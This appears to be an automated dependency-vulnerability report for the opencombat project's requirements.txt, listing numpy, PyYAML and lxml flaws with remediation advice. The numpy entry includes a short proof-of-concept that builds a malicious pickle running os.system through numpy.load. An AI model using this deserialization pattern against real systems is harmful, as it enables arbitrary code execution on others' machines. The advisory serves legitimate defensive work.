buxx/opencombat:requirements.txt

Vulnerabilities 3 via 3 paths
Dependencies 20
Source GitHub
Commit 97a8c0ff

Find, fix and prevent vulnerabilities in your code.

Severity
  • 2
  • 1
Status
  • 3
  • 0
  • 0
high severity

Arbitrary Code Execution

  • Vulnerable module: numpy
  • Introduced through: numpy@1.13.3

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b numpy@1.13.3

Overview

numpy is a fundamental package needed for scientific computing with Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

PoC by nanshihui:

import numpy
from numpy import __version__
print __version__
import os
import  pickle
class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f:
    pickle.dump(tmpdaa,f)
numpy.load('a-file.pickle')

Remediation

There is no fixed version for numpy.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: pyyaml
  • Introduced through: pyyaml@3.12

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b pyyaml@3.12

Overview

PyYAML is a YAML parser and emitter for Python.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to using the insecure yaml.load() function.

Remediation

Upgrade pyyaml to version 4.1 or higher.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: lxml
  • Introduced through: lxml@4.2.1

Detailed paths

  • Introduced through: buxx/opencombat@buxx/opencombat#97a8c0ffd82e31c96e4a0ad607c42f6d9ff0ad1b lxml@4.2.1

Overview

lxml is a Pythonic, mature binding for the libxml2 and libxslt libraries.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) attacks. Due to an improper escaping, an attacker could perform XSS attack in Internet Explorer.

Details

Cross-Site Scripting (XSS) attacks occur when an attacker tricks a user’s browser to execute malicious JavaScript code in the context of a victim’s domain. Such scripts can steal the user’s session cookies for the domain, scrape or modify its content, and perform or modify actions on the user’s behalf, actions typically blocked by the browser’s Same Origin Policy.

These attacks are possible by escaping the context of the web application and injecting malicious scripts in an otherwise trusted website. These scripts can introduce additional attributes (say, a "new" option in a dropdown list or a new link to a malicious site) and can potentially execute code on the clients side, unbeknown to the victim. This occurs when characters like < > " ' are not escaped properly.

There are a few types of XSS:

  • Persistent XSS is an attack in which the malicious code persists into the web app’s database.
  • Reflected XSS is an which the website echoes back a portion of the request. The attacker needs to trick the user into clicking a malicious link (for instance through a phishing email or malicious JS on another page), which triggers the XSS attack.
  • DOM-based XSS is an that occurs purely in the browser when client-side JavaScript echoes back a portion of the URL onto the page. DOM-Based XSS is notoriously hard to detect, as the server never gets a chance to see the attack taking place.

Remediation

Upgrade lxml to version 4.2.5 or higher.

References